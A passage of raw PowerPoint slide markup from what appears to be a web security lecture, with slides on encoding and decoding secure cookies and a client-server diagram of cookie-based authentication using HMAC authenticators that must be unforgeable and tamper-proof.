              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>encodedCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpSecureCookie.Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Decrypting and validating an encoded cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpSecureCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>De</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1853715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CE89A82E-644F-F14D-B313-D0D91CB8990E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Web Authentication with Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8D8B8C-847F-5C47-8B2A-0BABE5CB9302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2057400"/>
            <a:ext cx="1676400" cy="3124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28677" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35724DDD-59F7-0640-879F-A5033D586DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2057400"/>
            <a:ext cx="1676400" cy="3124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28678" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D465E00-D558-7643-9F87-05BAD6E8C477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771436" y="2138671"/>
            <a:ext cx="857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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28679" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E61203-5A26-584B-B5B1-0D154C635BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8012000" y="2055003"/>
            <a:ext cx="9573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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28681" name="Picture 8" descr="Apache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6CCBB4-B40C-CF47-A68F-5E7B7FCE4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6456" y="1865828"/>
            <a:ext cx="957313" cy="2888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82" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62050887-8CA2-6242-B929-1A5B210E666E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="2362200"/>
            <a:ext cx="3505200" cy="53340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8683" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4940672-60E7-7845-9F44-C437025DF575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860926" y="2346325"/>
            <a:ext cx="1914307" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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POST /login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28684" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4328C4-E2AB-FA4D-977D-65DFEF167685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="3733800"/>
            <a:ext cx="3505200" cy="53340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8685" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2FF03C7-847D-9A4E-800D-B611E8998501}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4191000" y="3048000"/>
            <a:ext cx="3505200" cy="53340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8686" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6876FE-8C01-494F-AE58-A376F4089952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4191000" y="4495800"/>
            <a:ext cx="3505200" cy="53340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8687" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE607F23-BD3E-BB44-8866-7B1E814AB406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495801" y="3048000"/>
            <a:ext cx="2847254" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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Set-Cookie:authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28688" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20115EA7-66B0-C24E-8EF5-8D9FD5F5F70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4805363" y="3733801"/>
            <a:ext cx="2310248" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>restricted.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28689" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ADCED45-7C85-FA48-AEA5-39FA9A45F6C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800601" y="4648200"/>
            <a:ext cx="2124299" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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Restricted content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28690" name="Picture 17" descr="j0215940">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CF15640-BE62-3B4A-BAB9-ABDCB6A36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572000"/>
            <a:ext cx="6096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91" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0880A4B6-6E68-2E4D-B012-C4FA54B92034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7904163" y="2725739"/>
            <a:ext cx="1590500" cy="437043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Verify that this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>client is authorized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28692" name="Text Box 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3E41D6-F833-8D4F-BF13-62FB0145E330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7905751" y="4114800"/>
            <a:ext cx="1561646" cy="781752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Check validity of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>authenticator – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>recompute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hash(key, session) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28693" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B65BDE4D-1999-7F4B-93B6-CCD8D8E1F1A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="5573713"/>
            <a:ext cx="8839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342900" indent="-342900">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>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lvl="1" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Authenticators must be</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unforgeable</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tamper-proof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(malicious client shouldn’t be able to compute his own or modify an existing authenticator)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE8AA8F-D420-764C-AE24-8D0878088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367" y="1740791"/>
            <a:ext cx="598729" cy="5987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0976DA-D951-4849-91D2-71D88925EF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11296650" y="6019800"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="A picture containing clipart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014C4895-1A74-6A4A-8CF9-4BE3668F17C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10368779" y="4689236"/>
            <a:ext cx="927871" cy="1116963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A2C44A-CDDA-0D44-A9BD-536972AEABCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20354036">
            <a:off x="10336047" y="4520168"/>
            <a:ext cx="736099" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HMAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA144A5-0928-8543-ACDF-41D91F210C08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4725472" y="4161749"/>
            <a:ext cx="2185214" cy="313932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Cookie:authenticator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27255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6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6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6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6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6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6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2" grpId="0" animBg="1"/>
      <p:bldP spid="28683" grpId="0" animBg="1"/>
      <p:bldP spid="28684" grpId="0" animBg="1"/>
      <p:bldP spid="28685" grpId="0" animBg="1"/>
      <p:bldP spid="28686" grpId="0" animBg="1"/>
      <p:bldP spid="28687" grpId="0" animBg="1"/>
      <p:bldP spid="28688" grpId="0" animBg="1"/>
      <p:bldP spid="28689" grpId="0" animBg="1"/>
      <p:bldP spid="28691" grpId="0" animBg="1"/>
      <p:bldP spid="28692" grpId="0" animBg="1"/>
      <p:bldP spid="28693" grpId="0"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712827DE-6171-6444-8FD0-551D2290226C}"/>
              </a:ext>
